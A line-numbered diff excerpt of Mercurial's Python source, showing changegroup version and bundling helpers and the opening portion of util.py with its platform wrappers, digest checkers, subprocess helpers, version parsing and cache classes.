842 835 # stick to full snapshot.
843 836 return nullrev
844 837 elif dp not in (p1, p2, prev):
845 838 # Pick prev when we can't be sure remote has the base revision.
846 839 return prev
847 840 else:
848 841 return dp
849 842
850 843 def builddeltaheader(self, node, p1n, p2n, basenode, linknode, flags):
851 844 # Do nothing with flags, it is implicitly 0 in cg1 and cg2
852 845 return struct.pack(self.deltaheader, node, p1n, p2n, basenode, linknode)
853 846
854 847 class cg3packer(cg2packer):
855 848 version = '03'
856 849 deltaheader = _CHANGEGROUPV3_DELTA_HEADER
857 850
858 851 def _packmanifests(self, dir, mfnodes, lookuplinknode):
859 852 if dir:
860 853 yield self.fileheader(dir)
861 854
862 855 dirlog = self._repo.manifestlog._revlog.dirlog(dir)
863 856 for chunk in self.group(mfnodes, dirlog, lookuplinknode,
864 857 units=_('manifests')):
865 858 yield chunk
866 859
867 860 def _manifestsdone(self):
868 861 return self.close()
869 862
870 863 def builddeltaheader(self, node, p1n, p2n, basenode, linknode, flags):
871 864 return struct.pack(
872 865 self.deltaheader, node, p1n, p2n, basenode, linknode, flags)
873 866
874 867 _packermap = {'01': (cg1packer, cg1unpacker),
875 868 # cg2 adds support for exchanging generaldelta
876 869 '02': (cg2packer, cg2unpacker),
877 870 # cg3 adds support for exchanging revlog flags and treemanifests
878 871 '03': (cg3packer, cg3unpacker),
879 872 }
880 873
881 874 def allsupportedversions(repo):
882 875 versions = set(_packermap.keys())
883 876 if not (repo.ui.configbool('experimental', 'changegroup3') or
884 877 repo.ui.configbool('experimental', 'treemanifest') or
885 878 'treemanifest' in repo.requirements):
886 879 versions.discard('03')
887 880 return versions
888 881
889 882 # Changegroup versions that can be applied to the repo
890 883 def supportedincomingversions(repo):
891 884 return allsupportedversions(repo)
892 885
893 886 # Changegroup versions that can be created from the repo
894 887 def supportedoutgoingversions(repo):
895 888 versions = allsupportedversions(repo)
896 889 if 'treemanifest' in repo.requirements:
897 890 # Versions 01 and 02 support only flat manifests and it's just too
898 891 # expensive to convert between the flat manifest and tree manifest on
899 892 # the fly. Since tree manifests are hashed differently, all of history
900 893 # would have to be converted. Instead, we simply don't even pretend to
901 894 # support versions 01 and 02.
902 895 versions.discard('01')
903 896 versions.discard('02')
904 897 return versions
905 898
906 899 def localversion(repo):
907 900 # Finds the best version to use for bundles that are meant to be used
908 901 # locally, such as those from strip and shelve, and temporary bundles.
909 902 return max(supportedoutgoingversions(repo))
910 903
911 904 def safeversion(repo):
912 905 # Finds the smallest version that it's safe to assume clients of the repo
913 906 # will support. For example, all hg versions that support generaldelta also
914 907 # support changegroup 02.
915 908 versions = supportedoutgoingversions(repo)
916 909 if 'generaldelta' in repo.requirements:
917 910 versions.discard('01')
918 911 assert versions
919 912 return min(versions)
920 913
921 914 def getbundler(version, repo, bundlecaps=None):
922 915 assert version in supportedoutgoingversions(repo)
923 916 return _packermap[version][0](repo, bundlecaps)
924 917
925 918 def getunbundler(version, fh, alg, extras=None):
926 919 return _packermap[version][1](fh, alg, extras=extras)
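Tying the version helpers and the packer map together, a hedged usage sketch (repo and fh are assumed to exist; 'UN' is the uncompressed stream type accepted by cg1unpacker above):

    # pick a changegroup version every expected client can read,
    # then build the matching packer and unpacker for it
    version = safeversion(repo)
    bundler = getbundler(version, repo)
    unbundler = getunbundler(version, fh, 'UN')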
927 920
928 921 def _changegroupinfo(repo, nodes, source):
929 922 if repo.ui.verbose or source == 'bundle':
930 923 repo.ui.status(_("%d changesets found\n") % len(nodes))
931 924 if repo.ui.debugflag:
932 925 repo.ui.debug("list of changesets:\n")
933 926 for node in nodes:
934 927 repo.ui.debug("%s\n" % hex(node))
935 928
936 929 def makechangegroup(repo, outgoing, version, source, fastpath=False,
937 930 bundlecaps=None):
938 931 cgstream = makestream(repo, outgoing, version, source,
939 932 fastpath=fastpath, bundlecaps=bundlecaps)
940 933 return getunbundler(version, util.chunkbuffer(cgstream), None,
941 934 {'clcount': len(outgoing.missing) })
942 935
943 936 def makestream(repo, outgoing, version, source, fastpath=False,
944 937 bundlecaps=None):
945 938 bundler = getbundler(version, repo, bundlecaps=bundlecaps)
946 939
947 940 repo = repo.unfiltered()
948 941 commonrevs = outgoing.common
949 942 csets = outgoing.missing
950 943 heads = outgoing.missingheads
951 944 # We go through the fast path if we get told to, or if all (unfiltered)
952 945 # heads have been requested (since we then know all linkrevs will
953 946 # be pulled by the client).
954 947 heads.sort()
955 948 fastpathlinkrev = fastpath or (
956 949 repo.filtername is None and heads == sorted(repo.heads()))
957 950
958 951 repo.hook('preoutgoing', throw=True, source=source)
959 952 _changegroupinfo(repo, csets, source)
960 953 return bundler.generate(commonrevs, csets, fastpathlinkrev, source)
961 954
962 955 def _addchangegroupfiles(repo, source, revmap, trp, expectedfiles, needfiles):
963 956 revisions = 0
964 957 files = 0
965 958 for chunkdata in iter(source.filelogheader, {}):
966 959 files += 1
967 960 f = chunkdata["filename"]
968 961 repo.ui.debug("adding %s revisions\n" % f)
969 962 repo.ui.progress(_('files'), files, unit=_('files'),
970 963 total=expectedfiles)
971 964 fl = repo.file(f)
972 965 o = len(fl)
973 966 try:
974 967 deltas = source.deltaiter()
975 968 if not fl.addgroup(deltas, revmap, trp):
976 969 raise error.Abort(_("received file revlog group is empty"))
977 970 except error.CensoredBaseError as e:
978 971 raise error.Abort(_("received delta base is censored: %s") % e)
979 972 revisions += len(fl) - o
980 973 if f in needfiles:
981 974 needs = needfiles[f]
982 975 for new in xrange(o, len(fl)):
983 976 n = fl.node(new)
984 977 if n in needs:
985 978 needs.remove(n)
986 979 else:
987 980 raise error.Abort(
988 981 _("received spurious file revlog entry"))
989 982 if not needs:
990 983 del needfiles[f]
991 984 repo.ui.progress(_('files'), None)
992 985
993 986 for f, needs in needfiles.iteritems():
994 987 fl = repo.file(f)
995 988 for n in needs:
996 989 try:
997 990 fl.rev(n)
998 991 except error.LookupError:
999 992 raise error.Abort(
1000 993 _('missing file data for %s:%s - run hg verify') %
1001 994 (f, hex(n)))
1002 995
1003 996 return revisions, files
mercurial/util.py
@@ -1,3867 +1,3876 @@
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import calendar
21 21 import codecs
22 22 import collections
23 23 import contextlib
24 24 import datetime
25 25 import errno
26 26 import gc
27 27 import hashlib
28 28 import imp
29 29 import itertools
30 30 import mmap
31 31 import os
32 32 import platform as pyplatform
33 33 import re as remod
34 34 import shutil
35 35 import signal
36 36 import socket
37 37 import stat
38 38 import string
39 39 import subprocess
40 40 import sys
41 41 import tempfile
42 42 import textwrap
43 43 import time
44 44 import traceback
45 45 import warnings
46 46 import zlib
47 47
48 48 from . import (
49 49 encoding,
50 50 error,
51 51 i18n,
52 52 node as nodemod,
53 53 policy,
54 54 pycompat,
55 55 urllibcompat,
56 56 )
57 57
58 58 base85 = policy.importmod(r'base85')
59 59 osutil = policy.importmod(r'osutil')
60 60 parsers = policy.importmod(r'parsers')
61 61
62 62 b85decode = base85.b85decode
63 63 b85encode = base85.b85encode
64 64
65 65 cookielib = pycompat.cookielib
66 66 empty = pycompat.empty
67 67 httplib = pycompat.httplib
68 68 pickle = pycompat.pickle
69 69 queue = pycompat.queue
70 70 socketserver = pycompat.socketserver
71 71 stderr = pycompat.stderr
72 72 stdin = pycompat.stdin
73 73 stdout = pycompat.stdout
74 74 stringio = pycompat.stringio
75 75 xmlrpclib = pycompat.xmlrpclib
76 76
77 77 httpserver = urllibcompat.httpserver
78 78 urlerr = urllibcompat.urlerr
79 79 urlreq = urllibcompat.urlreq
80 80
81 81 # workaround for win32mbcs
82 82 _filenamebytestr = pycompat.bytestr
83 83
84 84 def isatty(fp):
85 85 try:
86 86 return fp.isatty()
87 87 except AttributeError:
88 88 return False
89 89
90 90 # glibc determines buffering on first write to stdout - if we replace a TTY
91 91 # destined stdout with a pipe destined stdout (e.g. pager), we want line
92 92 # buffering
93 93 if isatty(stdout):
94 94 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
95 95
96 96 if pycompat.iswindows:
97 97 from . import windows as platform
98 98 stdout = platform.winstdout(stdout)
99 99 else:
100 100 from . import posix as platform
101 101
102 102 _ = i18n._
103 103
104 104 bindunixsocket = platform.bindunixsocket
105 105 cachestat = platform.cachestat
106 106 checkexec = platform.checkexec
107 107 checklink = platform.checklink
108 108 copymode = platform.copymode
109 109 executablepath = platform.executablepath
110 110 expandglobs = platform.expandglobs
111 111 explainexit = platform.explainexit
112 112 findexe = platform.findexe
113 113 getfsmountpoint = platform.getfsmountpoint
114 114 getfstype = platform.getfstype
115 115 gethgcmd = platform.gethgcmd
116 116 getuser = platform.getuser
117 117 getpid = os.getpid
118 118 groupmembers = platform.groupmembers
119 119 groupname = platform.groupname
120 120 hidewindow = platform.hidewindow
121 121 isexec = platform.isexec
122 122 isowner = platform.isowner
123 123 listdir = osutil.listdir
124 124 localpath = platform.localpath
125 125 lookupreg = platform.lookupreg
126 126 makedir = platform.makedir
127 127 nlinks = platform.nlinks
128 128 normpath = platform.normpath
129 129 normcase = platform.normcase
130 130 normcasespec = platform.normcasespec
131 131 normcasefallback = platform.normcasefallback
132 132 openhardlinks = platform.openhardlinks
133 133 oslink = platform.oslink
134 134 parsepatchoutput = platform.parsepatchoutput
135 135 pconvert = platform.pconvert
136 136 poll = platform.poll
137 137 popen = platform.popen
138 138 posixfile = platform.posixfile
139 139 quotecommand = platform.quotecommand
140 140 readpipe = platform.readpipe
141 141 rename = platform.rename
142 142 removedirs = platform.removedirs
143 143 samedevice = platform.samedevice
144 144 samefile = platform.samefile
145 145 samestat = platform.samestat
146 146 setbinary = platform.setbinary
147 147 setflags = platform.setflags
148 148 setsignalhandler = platform.setsignalhandler
149 149 shellquote = platform.shellquote
150 150 spawndetached = platform.spawndetached
151 151 split = platform.split
152 152 sshargs = platform.sshargs
153 153 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
154 154 statisexec = platform.statisexec
155 155 statislink = platform.statislink
156 156 testpid = platform.testpid
157 157 umask = platform.umask
158 158 unlink = platform.unlink
159 159 username = platform.username
160 160
161 161 try:
162 162 recvfds = osutil.recvfds
163 163 except AttributeError:
164 164 pass
165 165 try:
166 166 setprocname = osutil.setprocname
167 167 except AttributeError:
168 168 pass
169 169 try:
170 170 unblocksignal = osutil.unblocksignal
171 171 except AttributeError:
172 172 pass
173 173
174 174 # Python compatibility
175 175
176 176 _notset = object()
177 177
178 178 # disable Python's problematic floating point timestamps (issue4836)
179 179 # (Python hypocritically says you shouldn't change this behavior in
180 180 # libraries, and sure enough Mercurial is not a library.)
181 181 os.stat_float_times(False)
182 182
183 183 def safehasattr(thing, attr):
184 184 return getattr(thing, attr, _notset) is not _notset
185 185
186 186 def bytesinput(fin, fout, *args, **kwargs):
187 187 sin, sout = sys.stdin, sys.stdout
188 188 try:
189 189 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
190 190 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
191 191 finally:
192 192 sys.stdin, sys.stdout = sin, sout
193 193
194 194 def bitsfrom(container):
195 195 bits = 0
196 196 for bit in container:
197 197 bits |= bit
198 198 return bits
199 199
200 200 # Python 2.6 still has deprecation warnings enabled by default. We do not want
201 201 # to display anything to the standard user, so detect if we are running tests
202 202 # and only use Python deprecation warnings in this case.
203 203 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
204 204 if _dowarn:
205 205 # explicitly unfilter our warning for python 2.7
206 206 #
207 207 # The option of setting PYTHONWARNINGS in the test runner was investigated.
208 208 # However, module name set through PYTHONWARNINGS was exactly matched, so
209 209 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
210 210 # makes the whole PYTHONWARNINGS thing useless for our usecase.
211 211 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
212 212 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
213 213 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
214 214
215 215 def nouideprecwarn(msg, version, stacklevel=1):
216 216 """Issue a Python-native deprecation warning
217 217
218 218 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
219 219 """
220 220 if _dowarn:
221 221 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
222 222 " update your code.)") % version
223 223 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
224 224
225 225 DIGESTS = {
226 226 'md5': hashlib.md5,
227 227 'sha1': hashlib.sha1,
228 228 'sha512': hashlib.sha512,
229 229 }
230 230 # List of digest types from strongest to weakest
231 231 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
232 232
233 233 for k in DIGESTS_BY_STRENGTH:
234 234 assert k in DIGESTS
235 235
236 236 class digester(object):
237 237 """helper to compute digests.
238 238
239 239 This helper can be used to compute one or more digests given their name.
240 240
241 241 >>> d = digester([b'md5', b'sha1'])
242 242 >>> d.update(b'foo')
243 243 >>> [k for k in sorted(d)]
244 244 ['md5', 'sha1']
245 245 >>> d[b'md5']
246 246 'acbd18db4cc2f85cedef654fccc4a4d8'
247 247 >>> d[b'sha1']
248 248 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
249 249 >>> digester.preferred([b'md5', b'sha1'])
250 250 'sha1'
251 251 """
252 252
253 253 def __init__(self, digests, s=''):
254 254 self._hashes = {}
255 255 for k in digests:
256 256 if k not in DIGESTS:
257 257 raise Abort(_('unknown digest type: %s') % k)
258 258 self._hashes[k] = DIGESTS[k]()
259 259 if s:
260 260 self.update(s)
261 261
262 262 def update(self, data):
263 263 for h in self._hashes.values():
264 264 h.update(data)
265 265
266 266 def __getitem__(self, key):
267 267 if key not in DIGESTS:
268 268 raise Abort(_('unknown digest type: %s') % k)
269 269 return nodemod.hex(self._hashes[key].digest())
270 270
271 271 def __iter__(self):
272 272 return iter(self._hashes)
273 273
274 274 @staticmethod
275 275 def preferred(supported):
276 276 """returns the strongest digest type in both supported and DIGESTS."""
277 277
278 278 for k in DIGESTS_BY_STRENGTH:
279 279 if k in supported:
280 280 return k
281 281 return None
282 282
283 283 class digestchecker(object):
284 284 """file handle wrapper that additionally checks content against a given
285 285 size and digests.
286 286
287 287 d = digestchecker(fh, size, {'md5': '...'})
288 288
289 289 When multiple digests are given, all of them are validated.
290 290 """
291 291
292 292 def __init__(self, fh, size, digests):
293 293 self._fh = fh
294 294 self._size = size
295 295 self._got = 0
296 296 self._digests = dict(digests)
297 297 self._digester = digester(self._digests.keys())
298 298
299 299 def read(self, length=-1):
300 300 content = self._fh.read(length)
301 301 self._digester.update(content)
302 302 self._got += len(content)
303 303 return content
304 304
305 305 def validate(self):
306 306 if self._size != self._got:
307 307 raise Abort(_('size mismatch: expected %d, got %d') %
308 308 (self._size, self._got))
309 309 for k, v in self._digests.items():
310 310 if v != self._digester[k]:
311 311 # i18n: first parameter is a digest name
312 312 raise Abort(_('%s mismatch: expected %s, got %s') %
313 313 (k, v, self._digester[k]))
314 314
315 315 try:
316 316 buffer = buffer
317 317 except NameError:
318 318 def buffer(sliceable, offset=0, length=None):
319 319 if length is not None:
320 320 return memoryview(sliceable)[offset:offset + length]
321 321 return memoryview(sliceable)[offset:]
322 322
323 323 closefds = pycompat.isposix
324 324
325 325 _chunksize = 4096
326 326
327 327 class bufferedinputpipe(object):
328 328 """a manually buffered input pipe
329 329
330 330 Python will not let us use buffered IO and lazy reading with 'polling' at
331 331 the same time. We cannot probe the buffer state and select will not detect
332 332 that data are ready to read if they are already buffered.
333 333
334 334 This class lets us work around that by implementing its own buffering
335 335 (allowing efficient readline) while offering a way to know if the buffer is
336 336 empty from the output (allowing collaboration of the buffer with polling).
337 337
338 338 This class lives in the 'util' module because it makes use of the 'os'
339 339 module from the python stdlib.
340 340 """
341 341
342 342 def __init__(self, input):
343 343 self._input = input
344 344 self._buffer = []
345 345 self._eof = False
346 346 self._lenbuf = 0
347 347
348 348 @property
349 349 def hasbuffer(self):
350 350 """True if any data is currently buffered
351 351
352 352 This will be used externally as a pre-step for polling IO. If there is
353 353 already data then no polling should be set in place."""
354 354 return bool(self._buffer)
355 355
356 356 @property
357 357 def closed(self):
358 358 return self._input.closed
359 359
360 360 def fileno(self):
361 361 return self._input.fileno()
362 362
363 363 def close(self):
364 364 return self._input.close()
365 365
366 366 def read(self, size):
367 367 while (not self._eof) and (self._lenbuf < size):
368 368 self._fillbuffer()
369 369 return self._frombuffer(size)
370 370
371 371 def readline(self, *args, **kwargs):
372 372 if 1 < len(self._buffer):
373 373 # this should not happen because both read and readline end with a
374 374 # _frombuffer call that collapses it.
375 375 self._buffer = [''.join(self._buffer)]
376 376 self._lenbuf = len(self._buffer[0])
377 377 lfi = -1
378 378 if self._buffer:
379 379 lfi = self._buffer[-1].find('\n')
380 380 while (not self._eof) and lfi < 0:
381 381 self._fillbuffer()
382 382 if self._buffer:
383 383 lfi = self._buffer[-1].find('\n')
384 384 size = lfi + 1
385 385 if lfi < 0: # end of file
386 386 size = self._lenbuf
387 387 elif 1 < len(self._buffer):
388 388 # we need to take previous chunks into account
389 389 size += self._lenbuf - len(self._buffer[-1])
390 390 return self._frombuffer(size)
391 391
392 392 def _frombuffer(self, size):
393 393 """return at most 'size' data from the buffer
394 394
395 395 The data are removed from the buffer."""
396 396 if size == 0 or not self._buffer:
397 397 return ''
398 398 buf = self._buffer[0]
399 399 if 1 < len(self._buffer):
400 400 buf = ''.join(self._buffer)
401 401
402 402 data = buf[:size]
403 403 buf = buf[len(data):]
404 404 if buf:
405 405 self._buffer = [buf]
406 406 self._lenbuf = len(buf)
407 407 else:
408 408 self._buffer = []
409 409 self._lenbuf = 0
410 410 return data
411 411
412 412 def _fillbuffer(self):
413 413 """read data to the buffer"""
414 414 data = os.read(self._input.fileno(), _chunksize)
415 415 if not data:
416 416 self._eof = True
417 417 else:
418 418 self._lenbuf += len(data)
419 419 self._buffer.append(data)
420 420
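A minimal usage sketch of how this buffer is meant to cooperate with polling, using only the attributes defined above (hasbuffer, fileno, readline, closed); the child command and loop are illustrative assumptions, not code from the patch:

    import select

    _stdin, out = popen2(b'some-long-running-command')   # hypothetical child
    pipe = bufferedinputpipe(out)
    while not pipe.closed:
        if not pipe.hasbuffer:
            # nothing buffered yet, so it is safe to block in select
            select.select([pipe.fileno()], [], [])
        line = pipe.readline()
        if not line:
            break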
421 421 def mmapread(fp):
422 422 try:
423 423 fd = getattr(fp, 'fileno', lambda: fp)()
424 424 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
425 425 except ValueError:
426 426 # Empty files cannot be mmapped, but mmapread should still work. Check
427 427 # if the file is empty, and if so, return an empty buffer.
428 428 if os.fstat(fd).st_size == 0:
429 429 return ''
430 430 raise
431 431
432 432 def popen2(cmd, env=None, newlines=False):
433 433 # Setting bufsize to -1 lets the system decide the buffer size.
434 434 # The default for bufsize is 0, meaning unbuffered. This leads to
435 435 # poor performance on Mac OS X: http://bugs.python.org/issue4194
436 436 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
437 437 close_fds=closefds,
438 438 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
439 439 universal_newlines=newlines,
440 440 env=env)
441 441 return p.stdin, p.stdout
442 442
443 443 def popen3(cmd, env=None, newlines=False):
444 444 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
445 445 return stdin, stdout, stderr
446 446
447 447 def popen4(cmd, env=None, newlines=False, bufsize=-1):
448 448 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
449 449 close_fds=closefds,
450 450 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
451 451 stderr=subprocess.PIPE,
452 452 universal_newlines=newlines,
453 453 env=env)
454 454 return p.stdin, p.stdout, p.stderr, p
455 455
456 456 def version():
457 457 """Return version information if available."""
458 458 try:
459 459 from . import __version__
460 460 return __version__.version
461 461 except ImportError:
462 462 return 'unknown'
463 463
464 464 def versiontuple(v=None, n=4):
465 465 """Parses a Mercurial version string into an N-tuple.
466 466
467 467 The version string to be parsed is specified with the ``v`` argument.
468 468 If it isn't defined, the current Mercurial version string will be parsed.
469 469
470 470 ``n`` can be 2, 3, or 4. Here is how some version strings map to
471 471 returned values:
472 472
473 473 >>> v = b'3.6.1+190-df9b73d2d444'
474 474 >>> versiontuple(v, 2)
475 475 (3, 6)
476 476 >>> versiontuple(v, 3)
477 477 (3, 6, 1)
478 478 >>> versiontuple(v, 4)
479 479 (3, 6, 1, '190-df9b73d2d444')
480 480
481 481 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
482 482 (3, 6, 1, '190-df9b73d2d444+20151118')
483 483
484 484 >>> v = b'3.6'
485 485 >>> versiontuple(v, 2)
486 486 (3, 6)
487 487 >>> versiontuple(v, 3)
488 488 (3, 6, None)
489 489 >>> versiontuple(v, 4)
490 490 (3, 6, None, None)
491 491
492 492 >>> v = b'3.9-rc'
493 493 >>> versiontuple(v, 2)
494 494 (3, 9)
495 495 >>> versiontuple(v, 3)
496 496 (3, 9, None)
497 497 >>> versiontuple(v, 4)
498 498 (3, 9, None, 'rc')
499 499
500 500 >>> v = b'3.9-rc+2-02a8fea4289b'
501 501 >>> versiontuple(v, 2)
502 502 (3, 9)
503 503 >>> versiontuple(v, 3)
504 504 (3, 9, None)
505 505 >>> versiontuple(v, 4)
506 506 (3, 9, None, 'rc+2-02a8fea4289b')
507 507 """
508 508 if not v:
509 509 v = version()
510 510 parts = remod.split('[\+-]', v, 1)
511 511 if len(parts) == 1:
512 512 vparts, extra = parts[0], None
513 513 else:
514 514 vparts, extra = parts
515 515
516 516 vints = []
517 517 for i in vparts.split('.'):
518 518 try:
519 519 vints.append(int(i))
520 520 except ValueError:
521 521 break
522 522 # (3, 6) -> (3, 6, None)
523 523 while len(vints) < 3:
524 524 vints.append(None)
525 525
526 526 if n == 2:
527 527 return (vints[0], vints[1])
528 528 if n == 3:
529 529 return (vints[0], vints[1], vints[2])
530 530 if n == 4:
531 531 return (vints[0], vints[1], vints[2], extra)
532 532
533 533 # used by parsedate
534 534 defaultdateformats = (
535 535 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
536 536 '%Y-%m-%dT%H:%M', # without seconds
537 537 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
538 538 '%Y-%m-%dT%H%M', # without seconds
539 539 '%Y-%m-%d %H:%M:%S', # our common legal variant
540 540 '%Y-%m-%d %H:%M', # without seconds
541 541 '%Y-%m-%d %H%M%S', # without :
542 542 '%Y-%m-%d %H%M', # without seconds
543 543 '%Y-%m-%d %I:%M:%S%p',
544 544 '%Y-%m-%d %H:%M',
545 545 '%Y-%m-%d %I:%M%p',
546 546 '%Y-%m-%d',
547 547 '%m-%d',
548 548 '%m/%d',
549 549 '%m/%d/%y',
550 550 '%m/%d/%Y',
551 551 '%a %b %d %H:%M:%S %Y',
552 552 '%a %b %d %I:%M:%S%p %Y',
553 553 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
554 554 '%b %d %H:%M:%S %Y',
555 555 '%b %d %I:%M:%S%p %Y',
556 556 '%b %d %H:%M:%S',
557 557 '%b %d %I:%M:%S%p',
558 558 '%b %d %H:%M',
559 559 '%b %d %I:%M%p',
560 560 '%b %d %Y',
561 561 '%b %d',
562 562 '%H:%M:%S',
563 563 '%I:%M:%S%p',
564 564 '%H:%M',
565 565 '%I:%M%p',
566 566 )
567 567
568 568 extendeddateformats = defaultdateformats + (
569 569 "%Y",
570 570 "%Y-%m",
571 571 "%b",
572 572 "%b %Y",
573 573 )
574 574
575 575 def cachefunc(func):
576 576 '''cache the result of function calls'''
577 577 # XXX doesn't handle keyword args
578 578 if func.__code__.co_argcount == 0:
579 579 cache = []
580 580 def f():
581 581 if len(cache) == 0:
582 582 cache.append(func())
583 583 return cache[0]
584 584 return f
585 585 cache = {}
586 586 if func.__code__.co_argcount == 1:
587 587 # we gain a small amount of time because
588 588 # we don't need to pack/unpack the list
589 589 def f(arg):
590 590 if arg not in cache:
591 591 cache[arg] = func(arg)
592 592 return cache[arg]
593 593 else:
594 594 def f(*args):
595 595 if args not in cache:
596 596 cache[args] = func(*args)
597 597 return cache[args]
598 598
599 599 return f
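
# Doctest-style sketch (illustrative only, not part of the original module):
# cachefunc memoizes on positional arguments, so the wrapped function runs
# only once per distinct input.
#
#   >>> calls = []
#   >>> def double(x):
#   ...     calls.append(x)
#   ...     return x * 2
#   >>> cached = cachefunc(double)
#   >>> cached(2), cached(2), len(calls)
#   (4, 4, 1)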
600 600
601 601 class cow(object):
602 602 """helper class to make copy-on-write easier
603 603
604 604 Call preparewrite before doing any writes.
605 605 """
606 606
607 607 def preparewrite(self):
608 608 """call this before writes, return self or a copied new object"""
609 609 if getattr(self, '_copied', 0):
610 610 self._copied -= 1
611 611 return self.__class__(self)
612 612 return self
613 613
614 614 def copy(self):
615 615 """always do a cheap copy"""
616 616 self._copied = getattr(self, '_copied', 0) + 1
617 617 return self
618 618
619 619 class sortdict(collections.OrderedDict):
620 620 '''a simple sorted dictionary
621 621
622 622 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
623 623 >>> d2 = d1.copy()
624 624 >>> d2
625 625 sortdict([('a', 0), ('b', 1)])
626 626 >>> d2.update([(b'a', 2)])
627 627 >>> list(d2.keys()) # should still be in last-set order
628 628 ['b', 'a']
629 629 '''
630 630
631 631 def __setitem__(self, key, value):
632 632 if key in self:
633 633 del self[key]
634 634 super(sortdict, self).__setitem__(key, value)
635 635
636 636 if pycompat.ispypy:
637 637 # __setitem__() isn't called as of PyPy 5.8.0
638 638 def update(self, src):
639 639 if isinstance(src, dict):
640 640 src = src.iteritems()
641 641 for k, v in src:
642 642 self[k] = v
643 643
644 644 class cowdict(cow, dict):
645 645 """copy-on-write dict
646 646
647 647 Be sure to call d = d.preparewrite() before writing to d.
648 648
649 649 >>> a = cowdict()
650 650 >>> a is a.preparewrite()
651 651 True
652 652 >>> b = a.copy()
653 653 >>> b is a
654 654 True
655 655 >>> c = b.copy()
656 656 >>> c is a
657 657 True
658 658 >>> a = a.preparewrite()
659 659 >>> b is a
660 660 False
661 661 >>> a is a.preparewrite()
662 662 True
663 663 >>> c = c.preparewrite()
664 664 >>> b is c
665 665 False
666 666 >>> b is b.preparewrite()
667 667 True
668 668 """
669 669
670 670 class cowsortdict(cow, sortdict):
671 671 """copy-on-write sortdict
672 672
673 673 Be sure to call d = d.preparewrite() before writing to d.
674 674 """
675 675
676 676 class transactional(object):
677 677 """Base class for making a transactional type into a context manager."""
678 678 __metaclass__ = abc.ABCMeta
679 679
680 680 @abc.abstractmethod
681 681 def close(self):
682 682 """Successfully closes the transaction."""
683 683
684 684 @abc.abstractmethod
685 685 def release(self):
686 686 """Marks the end of the transaction.
687 687
688 688 If the transaction has not been closed, it will be aborted.
689 689 """
690 690
691 691 def __enter__(self):
692 692 return self
693 693
694 694 def __exit__(self, exc_type, exc_val, exc_tb):
695 695 try:
696 696 if exc_type is None:
697 697 self.close()
698 698 finally:
699 699 self.release()
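
# Illustrative sketch (assumed example, not part of the original module): a
# concrete subclass only needs close() and release(); the context manager
# protocol then commits on a clean exit and always releases afterwards.
#
#   class demotransaction(transactional):
#       def close(self):
#           print('committed')
#       def release(self):
#           print('released')
#
#   with demotransaction():
#       pass  # prints 'committed', then 'released'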
700 700
701 701 @contextlib.contextmanager
702 702 def acceptintervention(tr=None):
703 703 """A context manager that closes the transaction on InterventionRequired
704 704
705 705 If no transaction was provided, this simply runs the body and returns
706 706 """
707 707 if not tr:
708 708 yield
709 709 return
710 710 try:
711 711 yield
712 712 tr.close()
713 713 except error.InterventionRequired:
714 714 tr.close()
715 715 raise
716 716 finally:
717 717 tr.release()
718 718
719 719 @contextlib.contextmanager
720 720 def nullcontextmanager():
721 721 yield
722 722
723 723 class _lrucachenode(object):
724 724 """A node in a doubly linked list.
725 725
726 726 Holds a reference to nodes on either side as well as a key-value
727 727 pair for the dictionary entry.
728 728 """
729 729 __slots__ = (u'next', u'prev', u'key', u'value')
730 730
731 731 def __init__(self):
732 732 self.next = None
733 733 self.prev = None
734 734
735 735 self.key = _notset
736 736 self.value = None
737 737
738 738 def markempty(self):
739 739 """Mark the node as emptied."""
740 740 self.key = _notset
741 741
742 742 class lrucachedict(object):
743 743 """Dict that caches most recent accesses and sets.
744 744
745 745 The dict consists of an actual backing dict - indexed by original
746 746 key - and a doubly linked circular list defining the order of entries in
747 747 the cache.
748 748
749 749 The head node is the newest entry in the cache. If the cache is full,
750 750 we recycle head.prev and make it the new head. Cache accesses result in
751 751 the node being moved to before the existing head and being marked as the
752 752 new head node.
753 753 """
754 754 def __init__(self, max):
755 755 self._cache = {}
756 756
757 757 self._head = head = _lrucachenode()
758 758 head.prev = head
759 759 head.next = head
760 760 self._size = 1
761 761 self._capacity = max
762 762
763 763 def __len__(self):
764 764 return len(self._cache)
765 765
766 766 def __contains__(self, k):
767 767 return k in self._cache
768 768
769 769 def __iter__(self):
770 770 # We don't have to iterate in cache order, but why not.
771 771 n = self._head
772 772 for i in range(len(self._cache)):
773 773 yield n.key
774 774 n = n.next
775 775
776 776 def __getitem__(self, k):
777 777 node = self._cache[k]
778 778 self._movetohead(node)
779 779 return node.value
780 780
781 781 def __setitem__(self, k, v):
